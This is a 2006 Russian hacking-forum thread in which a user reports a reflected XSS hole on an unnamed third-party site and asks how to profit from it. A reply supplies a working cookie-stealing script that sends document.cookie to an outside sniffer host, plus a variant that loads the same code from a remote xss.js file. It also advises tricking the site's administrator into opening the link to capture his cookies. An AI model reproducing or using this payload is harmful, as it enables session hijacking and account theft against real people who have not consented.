ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Помогите разобраться с Xss
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите разобраться с Xss
  #1  
Старый 23.02.2006, 18:47
Аватар для LoFFi
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию Помогите разобраться с Xss
Я вот тут нашел сайт левенький, и через некоторое время нашел дыру XSS

http://www.......ru/news/index.php?param=1<h1>XSS</h1>

Только вот подскажите что я с этого теперь могу поиметь и как.
 
Ответить с цитированием

  #2  
Старый 23.02.2006, 20:40
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
С начало читаем...

http://antichat.ru/crackchat/HTML/

http://antichat.ru/sniff/

Потом смотрим видео

http://video.antichat.net/1_0.html
Последний раз редактировалось Electro; 23.02.2006 в 20:42..
 
Ответить с цитированием

  #3  
Старый 23.02.2006, 20:51
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Это пассивный XSS. Можешь вписать туда <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> если не фильтруются какие-либо спец символы. Если фильтруются можешь сделать так <script src=http://твой сайт/xss.js></script>Где в xss.js записано img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; И дать эту ссылку админу. Если он лопух, получишь его куки.
__________________
Full DNS report
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как запустить эксплоит? Помогите разобраться sensible Форумы 7 25.01.2006 01:44
Помогите разобраться с угоном Аськи seeattact ICQ 5 17.01.2006 03:14
Помогите разобраться с методом описанным на этом сайте BARMALEY E-Mail 3 30.05.2005 12:18
Sql-инъекции в чате. Помогите разобраться. Sumdex Чаты 1 28.03.2005 15:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ